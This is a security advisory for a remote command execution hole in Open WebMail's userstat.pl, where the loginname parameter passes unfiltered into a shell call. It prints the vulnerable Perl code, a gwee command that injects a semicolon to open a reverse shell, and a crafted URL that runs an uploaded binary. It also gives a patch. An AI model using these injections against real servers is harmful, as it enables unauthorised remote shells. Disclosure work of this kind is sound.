‘Open Webmail Remote Command Execution (userstat.pl)’

Summary

Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail’. A remote attacker can run arbitrary commands with the web server’s privileges by exploiting an unfiltered parameter in userstat.pl.’

Credit:

‘The information has been provided by Michel Blomgren.’


Details

Vulnerable Systems:
 * Open Webmail versions 2.20, 2.21 and 2.30
 * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below)

The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn’t properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a ‘;’, ‘|’ or ‘( )’ followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, ‘nobody’ or ‘www’, e.g.).

Vulnerable Code:
From userstat.pl (about line 52):
my $user = cookie(‘openwebmail-loginname’) || param(‘loginname’) || ”;
my $playsound = param(‘playsound’)||”;
my $html=qq|<a href=’_URL_’ target=’_blank’ style=’text-decoration: none’>|.
         qq|<font color=’_COLOR_’>_TEXT_</font></a>|;

if ($user ne ”) {
   my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`; # <– $user is used in the system call
   if ($status =~ /has no mail/) {

Exploit:
At least 2 exploits are in circulation, one by Nullbyte and one a rewrite by Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30 5.8MB) is limited (see ‘Vendor Status’ below). You can use Gwee (generic web exploitation engine) available from http://cycom.se/dl/gwee to exploit using the following command:

$ gwee -L -y’loginname=%3B’ -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl

 -L Use built-in TCP listener (like ‘nc -l’).
 -l The host or IP address to have the reverse shell code connect back to.
 -p The port to have the reverse shell code connect back to.

Vendor Status:
Cycom AB has provided a diff patch that fixes the issue. Ken Girrard wrote and published an advisory long before this one. He provided a patch with his advisory that results in userstat.pl still being vulnerable to remote arbitrary command execution, this patch is applied to (shipped with) openwebmail-current.tgz released 2004-04-30 (5.8MB).

Girrard’s patch doesn’t filter out ‘|’ (pipes) and ‘/’, but does filter out spaces and tabs, which makes it impossible to pass arguments to commands an attacker would want to execute.

Nevertheless, it’s still possible to execute commands without arguments. An example of such an attack would be an attacker that has write access to the box using e.g. FTP and uploads a reverse shell code, marks it executable and enters the absolute path to it in a crafted URL like this one for example:
http://target/cgi-bin/openwebmail/userstat.pl?loginname=%7C/home/fu/bar

Unofficial Patch:
– — userstat.pl.orig 2004-02-20 14:58:06.000000000 +0100
+++ userstat.pl 2004-02-21 18:05:16.000000000 +0100
@@ -52,6 +52,9 @@
my $html=qq|<a href=’_URL_’ target=’_blank’ style=’text-decoration: none’>|.
          qq|<font color=’_COLOR_’>_TEXT_</font></a>|;

+# filter out dangerous characters
+$user =~ s/[/’\’`|<>\()[]{}$s;&]//g;
+
 if ($user ne ”) {
    my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
    if ($status =~ /has no mail/) {

cd cgi-bin/openwebmail/ and run: $ patch -i owm.patch’

Categories: UNIX